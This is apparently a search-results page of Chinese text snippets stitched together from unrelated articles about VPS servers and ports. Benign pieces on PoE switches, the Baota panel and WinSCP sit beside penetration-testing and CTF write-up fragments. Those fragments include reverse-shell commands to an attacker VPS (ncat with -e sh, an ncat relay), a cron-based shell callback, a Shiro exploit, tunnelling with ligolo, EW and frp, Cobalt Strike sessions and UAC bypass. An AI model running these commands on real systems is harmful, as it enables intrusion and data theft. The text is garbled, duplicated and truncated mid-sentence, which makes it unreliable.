目前README给出的教程都是基于推送后台的(运营层面),那如果是业务第三方(别的团队技术)是怎么使用的?今天就以实际场景来补下文档。...如果有多个用,逗号分隔开。...如果有多个用,逗号分隔开。
那它是怎么做的呢? 小傅哥,先举个这样登录的例子,让大家熟悉下这个业务场景。 通过这样的一个页面效果展示,我们粗略的可以知道,用户页面不断的 checkScan 检测,是需要用到一个唯一ID值。...而当用户用微信扫码后,这个唯一ID值则可以通过微信公众号获取到并保存,同时创建出唯一ID 和 Token 的映射关系。...接下来小傅哥就给大家分享下,怎么来实现一下这个方案。 文末提供了「星球:码农会锁」优惠加入方式,以及本节课程的代码地址。...https://natapp.cn/ 购买后,配置你的隧道本地端口为 8091 也就是你本地 SpringBoot 程序的端口。...如果你不是 8091 端口,可以修改为其他的 软件下载,内网穿透需要一个本地的软件。你可以从它的网站下载。
马克-to-win:Port端口是个伟大的发明。否则当我又想访问www.baidu.com获得他的网页,又想同时访问这台机器的sqlserver数据库获取数据库时怎么办呢?这时就用端口来区分。...一个在80口,一个在1433端口。一个端口相对于一个程序(先不谈一个程序用多个端口的情况)。一台机器共有65536个端口。...顺便说一句:操作系统保留了使用端口1到端口1024的权力,所以没事别用这些端口。(if you really use 1023, it may not report error.
1、什么是PoE交换机 PoE交换机由IEEE 802.3af标准定义,可为每个端口提供高达15.4W的直流电源。...802.3af(PoE)和802.3at(PoE+)之间的主要区别是PoE+电源设备提供的功率几乎是PoE设备的两倍,这意味着通常部署的VoIP电话、WAP和网络摄像机将在PoE+端口上运行。...5、PoE+交换机的优势 a、具有更高的功率:PoE+交换机每端口最多可以提供30W的功率,而PoE交换机每端口最多可以提供15.4W的功率。...PoE交换机的供电设备上可用的最小功率为每端口12.95W,而PoE+交换机的可用最小功率是每端口25.5W。
话说魏艾斯博客平时用的 SSH 链接软件是 Xshell,这种软件有一个好用顺手的就行了。前几天有一个萌新问老魏:看到宝塔远程桌面助手有 Linux 服务器选项,不知道怎么用。...那么今天老魏就来说一下宝塔远程桌面助手怎么用(Linux 服务器)。 老魏写过宝塔远程桌面助手使用教程,适用于 Windows 服务器。...看上图把你 VPS 服务器的 IP 地址和端口号输入,选择 Linux 服务器,输入服务器的账号密码,点击连接,就可以登录到 Linux 服务器上了。 ?...眼尖的同学会发现宝塔远程助手的 Linux 实现方法其实是调用了 PuTTY 来实现的,所以如果你会使用别的 SSH 连接软件,那么这个也没问题。...相关知识:如何下载安装使用 SSH 软件 总体来说宝塔远程桌面助手是一款多用途的远程桌面软件,Windows 服务器和 Linux 服务器都可以用,方便又容易上手,只要你有在使用 VPS 服务器备一个还是蛮实用的
文件中,替换hta文件中箭头的双引号部分 然后将hta文件上传到vps,接着利用python自带的命令,开启一个临时web 然后设置msf监听,这里设置x86的版本payload 然后在jboss...端中查看不了该类命名文件 于是还是决定上线一个cs在做后续,因为CS可以下载桌面文件,这里肯定会有人问我为啥不远程连接3389,我这里先说一下连接3389,我这里连接不上,因为可能是阿里云做了限制不允许外联,只能从别的地方下手了...msf上传过去,然后在shell端执行,即可上线 那么目前可以想到的就是继续做信息搜集,或者横向移动,这里决定先做信息搜集,先将桌面文件下载下来,但是这里下载后发现文件并打不开,不知道这里的lnk文件怎么变成了...这里引用3h师傅的文章,打字太累了,偷懒一下 最后就成功连接上了 然后通过域控查找的命令,可以看到当前机器不在域中,那么就要想办法先进入到一台域机器中 这里使用3h师傅之前给命令探测内网存活主机,用cs...这些工具扫不出来的时候,就可以考虑使用这个 for /l %i in (1,1,255) do @ ping 192.168.2.
大概率是shiro 由于这个环境并不稳定,请求多了就卡住(自带防御属性啊~) https://github.com/tangxiaofeng7/Shiroexploit 判断可以出网后把shell反弹到vps...执行命令验证是否为docker环境: 确实为docker环境,那么就看看宿主机有没有什么漏洞可以利用,使用 cat /etc/hosts,看到了主机IP为 192.168.16.2: 到这里本来想代理流量本地开工具扫扫的...-9999] 1>> 1.txt 2>/dev/null 命令执行完了查看文件发现两个端口开着服务,一个是SSH: 一个是9000端口的Portainer面板: 那么思路来了,要么爆破进行SSH,要么爆破进...Portainer,接下来可以上代理了,继续用wget下载到docker里: Docker上执行: chmod +x ligolo_linux_amd64 && ligolo_linux_amd64 -...relayserver=0.0.0.0:88 88端口用于docker和vps通信,103端口用于开放socks代理。
,那先尝试提权 能弹shell但是接收不到的时候,可以看一下目标是不是限制出网或者限制出站端口 如果限制出网那就先尝试提权,如果限制出站端口可以批量试一下常见的端口,在自己的vps上,通过nginx监听多个端口来快速启动多个端口...,然后再在目标机器上上传个sh脚本,批量curl自己vps的指定端口,最后看一下结果就可以了,nmap ---top-ports 100或1000可以扫描nmap整理的100或1000个最常用的端口,可以参考一下...如果要修改执行的间隔可以研究一下cron的语法,上面的是每分钟弹一次shell 内网 信息收集 激动人心的时刻来了,打内网 因为我拿到的shell都是linux下的,没有类似windows上的域控等等,所以此处就扫扫端口...,所以建个代理还是很有必要的 此处我推荐用frp,然后依旧遵循动静小点的原则,不在目标机器上开端口,在自己的vps上架设frp的服务端,在目标机器上架设frp的客户端,然后在客户端启用socks5代理插件...vps上,实现通过转发出网 通过ncat转发出网: 中转的机器执行: ncat -l 中转机器接收内网反弹来的shell的端口 -c 'ncat 攻击机的ip 攻击机的端口' 这样攻击机就可以接收到不出网的设备弹的
大概率是shiro 由于这个环境并不稳定,请求多了就卡住(自带防御属性啊~) https://github.com/tangxiaofeng7/Shiroexploit 判断可以出网后把shell反弹到vps...执行命令验证是否为docker环境: 确实为docker环境,那么就看看宿主机有没有什么漏洞可以利用,使用 cat /etc/hosts,看到了主机IP为192.168.16.2: 到这里本来想代理流量本地开工具扫扫的...-9999] 1>> 1.txt 2>/dev/null 命令执行完了查看文件发现两个端口开着服务,一个是SSH: 一个是9000端口的Portainer面板: 那么思路来了,要么爆破进行SSH,要么爆破进...Portainer,接下来可以上代理了,继续用wget下载到docker里: Docker上执行: chmod +x ligolo_linux_amd64 && ligolo_linux_amd64 -...relayserver=0.0.0.0:88 88端口用于docker和vps通信,103端口用于开放socks代理。
BypassUAC 方法测试 MSF 和 CS 联动来 Bypass UAC MSF → Meterpreter 方向弹 shell 0x02 Cobalt Strike 中的提权命令 一些后渗透命令要求系统管理员级别的权限...因为我个人的贫穷,我一直用的我朋友的一台 低配 VPS(内存可能 512),所以我在这仅仅的一台 VPS 上同时开了 CS 团队服务器和 MSF,最终导致了内存不足的结果。 贫穷的我继续借 VPS。...要弹回的肯定是 reverse_tcp 监听器的端口,这个监听器肯定不可能开在 50050 端口上啊,团队服务器都占用了不是?...所以我很怀疑写那篇文章的人怎么弹回到 50050 端口的,除非他把团队服务器的默认端口改了…… 总之,重新设置 lport,使其与 windows/beacon_http/reverse_http 监听器的端口对应...0x07 后续学习 关于 UAC 的学习路线: UAC 是什么 什么情况下会出现 UAC 针对不同的系统版本怎么正常绕 UAC 针对不同的系统版本怎么免杀绕 UAC 绕过 UAC 之后怎么免杀执行自己的
3、宝塔重启 VPS 服务器和重启面板 登陆宝塔面板后的首页,上面就能看到“重启服务器”和“重启面板”的按钮,点击后如下图所示,点击确定即可重启。 ?...5、宝塔面板修改端口 如果你想做项目添加别的端口就直接添加好了,记得输入一个不容易被猜到的数字,写上备注,最后点击放行即可。 以默认的 SSH 端口为例子说一下。...以上修改 22 端口顺序别搞混了,否则会进不去宝塔面板。 ? 6、宝塔怎么配置 SFTP SFTP 不需要设置,无论宝塔面板还是 lnmp 环境都不用设置。...SFTP 账号密码可以在你购买的 VPS 服务器后台找到,账号一般是 root。相关的文章可以阅读:SFTP 和 FTP 的区别及用 SFTP 代替 FTP,里面有具体操作方法。...可以用 SFTP 软件来实现同样功能,参考WinSCP-SFTP 管理传输软件安装使用教程。 ?
set USER_FILE user.txt set PASS_FILE pass.txt run Web 渗透 dirsearch 扫一下 python3 dirsearch.py -u http:...,使用nc再次反弹过来 现在拿到的只有一个shell,但是怎么样才能使用msf其他功能呢?...set session 1 session => 1 msf6 post(multi/manage/shell_to_meterpreter) > exploit 这里还是没有提升成功,猜测可能是我用的公网...开启服务端(VPS) ....proxychains nmap -sV -sT 172.17.0.1 -p 1-65535 #p参数可以指定端口范围 扫个一两分钟就可以了,如果不经过公网代理的话,速度可能会快一些,当然真实环境下需要控制扫描速率
的地址,LPORT是端口 0x02....弹回Meterpreter会话 将生成的msf的木马上传到目标服务器上,然后直接运行 运行之后,vps的msf会收到一个弹回的meterpreter会话 0x04....二、信息收集(随便搜集搜集得了) 可以用meterpreter的语法,也可以用让meterpreter弹回一个cmd命令窗口 meterpreter下执行execute -f cmd.exe -i或者...端口扫描 直接搜索端口扫描模块:search portscan 使用端口扫描 arp_sweep、tcp、udp、dbnmap等方式探测存活 auxiliary/scanner auxiliary辅助模块下的...scanner里面都是扫描 差不多得了,不扫了,扫半小时就这么点儿 恶心,下次用其他模块扫 0x03.
3、在左侧的My PC机上用mstsc登陆139.XXX.XX.113:5555或者在VPS上用mstsc登陆127.0.0.1:5555。...该命令意思是在A主机上利用lcx_slave方式,将公网VPS的888端口和B主机的999端口连接起来。 D. 返回我们公网VPS的CMD界面下,可以看到已经连接成功了。 ?...在左侧公网VPS上运行命令,将1080端口收到的代理请求转交给888端口: ew -s rcsocks -l 1080 -e 888 B.在A主机上运行命令,将公网VPS的888端口和B主机的999端口连接起来...我在代理下用扫描工具一般都是用proxychains,大家接着往下看!...如上图所示,均表示相当好使,我们最后再试试大杀器-Metasploit可不可以用。 ? 我们随便找个IP扫扫看端口,如下图所示,已经开始扫描了。 ? 其他工具就不再一一介绍了。 TheEnd.
火日师傅、NSIS、FlappyPig的师傅在结束前应该是存在有效payload,Orz 题目描述 Welcome to ATField. hint: 1: 在第一题里不只有flag,还有第二题的入口 2、扫端口没用...绕过,绕过ssrf之后,大部分人都选择了扫127.0.0.1的端口,想找到本地开启的服务。...u=http://127.0.0.1 在有域名的vps上写一个跳转页面实现,事实上,只有第二种做法可以顺利继续做下一题 AT Field2 到了这里,很容易误解认为要扫本机的服务,所以及时放出了3个提示...1: 在第一题里不只有flag,还有第二题的入口 2、扫端口没用,几百线程也没用的呀 3、我从来没说过,flag1那里没有别的东西啊 不能说提示有多明显吧,但是我相信从hint不难得出,在上一个flag...所在页面,存在一些别的未知的文件,那么抄起扫目录的脚本,跑一跑,很快找到http://127.0.0.1/README.md base64解码得到 11.23 ak说上线的.git要都删了,以免被拖源码
访问一下,源码得到flag 图片 PS:下个flag网站管理员才能看到哦 flag{f42f76f14f9cce709a39b3bdad69a627} 场景二 这个应该就是网站后台吧,dirsearch扫一下...f3b1bce4b65eea538acd840cb304c051} 场景四 这道应该就是和数据库有关系了,同时涉及到权限 find一下database,寻找config.php的相关配置 图片 得到root为root/root nmap扫一下开放端口...图片 图片 发现3306mysql端口并没有打开,搜了一下可以直接在蚁剑里用mysqldump dump下来 mysqldump -uroot -proot flag > flag.sql...上shell,蚁剑终端不舒服 ncat vps 8806 -e sh 图片 弹错shell了,应该是shiro反序列化的那个靶机 写入内存马 图片 连不上,我不李姐 这里用python来反弹...flag 图片 flag{a790c8d551bbe198354f427c9fff6837} 场景九 Internal network 擦,感觉该进内网了,没ipconfig,有git,猜我怎么想的
如果你购买的云主机或VPS主机是Linux系统,会发现与原来的虚拟主机想比,有些用不来,因为管理主机需要登录SSH。...现在的VPS或云主机都有一键安装包和主机面板,所以WinSCP的作用就小了很多,它除了删除,上传下载,移动,修改,压缩,解压缩文件,我实在想不出它还有什么别的作用。...文件协议默认SFTP连接,端口号一般也是22,如非自己改了端口,WinSCP也可以当做FTP工具使用,把文件协议下拉菜单,选择FTP即可。...如果解压缩.tgz文件的话,可以用下边的untar/gzip的命令菜单。...管理主机 5、如果要是解压缩的格式是别的格式怎么办呢,可以Ctar+T调出命令窗口,或在底部右键选择命令行,会出现输入命令的小窗口。
项目作者:SiJiDo 项目地址:https://github.com/SiJiDo/H 文案排版:释然IT杂谈 一、软件介绍: H是一款强大的资产收集管理平台,主要用于src信息收集和红蓝对抗资产收集用,...实现以下功能: 域名扫描 端口扫描 web站点扫描 目录扫描 漏洞扫描(nuclei, 自定义poc, xray+rad) host碰撞插件 apk域名提取插件 备案信息查询 fofa...系统设置模块 该模块几个参数 同时扫描任务上限,这里的2意思是可以2个项目一起并行扫,但是也需要节点数量够,大部分节点都是多线程,多进程,部分如域名扫描时单进程(后续优化) 自定义poc地址,这里填你...poc管理的github或者gitee地址,国内vps建议用gitee,更新拉取的时候不会出错,poc格式参照nuclei的格式即可,在扫描模式勾选了自定义poc会从你在此次设定的github地址拉取你的...扫描模式预设了2个模式,full和normal,里面有组件勾选 注意:如果选择了对应的组件,但该组件没有节点连接,则会项目卡在该阶段一直等待 定时模块 定时模块主要作用是,比如一个src项目需要每个月扫一次
当然也可以使用WireShark等抓包工具,但是又不会用怎么办?没事使用Ladon一条命令就搞定,非常简单。...0x004 捕获0day、1day 不知道大家有没发现,现在随便在一台VPS上开启个端口,几天之内,就有好几个扫描器光顾。...,就监听哪个端口,当然越多越好,因为不同WEB应用,可能有它的特定端口,别人扫特定漏洞的包你可以轻松记录下来,看到没见过的POC,它不就是0day咯,当然这个概率可能比较低,或者抓到的是不太重要的0day...0x009 获取目标外网IP 在VPS上一键开启WEB后,目标访问http://vpsIP/ip.jpg,返回目标外网IP 0x010 检测目标是否允许HTTP出网 在VPS上一键开启WEB后,目标访问...早期都是用TCP协议实现,之后FTP、HTTP(什么网盘、邮箱、博客等都是并非什么新方式只是换个网址或API而已),大家常用的CS也是HTTP协议,本文用Ladon来实现个简单的C2。
*原创作者:补丁君,本文属FreeBuf原创奖励计划,未经许可禁止转载 笔者使用环境 本机 Debian Linux 服务器 VPS(Debian Linux) 目标 Windows 2003(虚拟机)...注意还未运行前端口开放状态 ? 运行木马后,Cobalt Strike已经呈现出一个主机会话了 ? 可以发现,会话延迟很高!主机的一些信息都还没反应过来!此时我们再来看看主机端口开放情况 ?...与运行前并无什么差别的~ 现在也有很多后门传输开始走DNS隧道了,比以往走HTTP、TCP等更难察觉,传送门http://www.freebuf.com/sectool/110815.html ?...的ip——>木马与VPS建立DNS隧道连接 VPS上的teamserver向本机Cobalt Strike返回主机会话 后面怎么利用就是beacon>help 查看命令自己造吧~~ 那么,我们试试不走DNS...此时,我们查看下目标主机端口开放情况 ? 这就是走HTTP传输了,端口开放可以被探测到,但这种模式传输数据相对要快很多了 ?
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
实时音视频
即时通信 IM
